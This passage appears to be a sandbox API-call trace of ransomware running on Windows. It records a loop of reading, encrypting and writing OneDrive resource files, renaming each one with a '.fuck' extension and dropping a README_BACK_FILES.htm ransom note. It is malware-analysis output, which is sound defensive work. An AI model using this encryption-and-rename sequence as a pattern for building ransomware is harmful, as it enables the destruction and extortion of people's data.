hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.859] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.859] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.859] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.859] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.859] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.860] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.860] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.860] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.860] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.860] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.860] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.861] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.861] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.861] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.861] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.861] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.861] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.862] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.862] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.862] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.862] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.862] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.863] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.863] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.863] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.863] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.863] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.863] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.863] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.863] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.863] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.863] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.863] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x350, lpOverlapped=0x0) returned 1 [0275.863] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x350, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x360) returned 1 [0275.863] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x360, lpOverlapped=0x0) returned 1 [0275.864] CloseHandle (hObject=0x5d48) returned 1 [0275.864] CloseHandle (hObject=0x5d3c) returned 1 [0275.864] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0275.871] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0275.871] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0275.873] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0275.875] CryptDestroyHash (hHash=0x2fa748) returned 1 [0275.875] CryptDestroyKey (hKey=0x2fb548) returned 1 [0275.875] CryptReleaseContext (hProv=0x2f2a960, dwFlags=0x0) returned 1 [0275.875] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0275.875] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0275.875] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\readme_back_files.htm")) returned 0xffffffff [0275.875] AreFileApisANSI () returned 1 [0275.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0275.876] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0275.877] GetFileType (hFile=0x5d4c) returned 0x1 [0275.877] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0275.878] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.878] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0275.878] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.878] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.878] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0275.878] GetLastError () returned 0x0 [0275.878] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui")) returned 0x20 [0275.879] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0275.880] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0275.881] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0275.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0275.883] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a278) returned 1 [0275.885] CryptCreateHash (in: hProv=0x2f2a278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 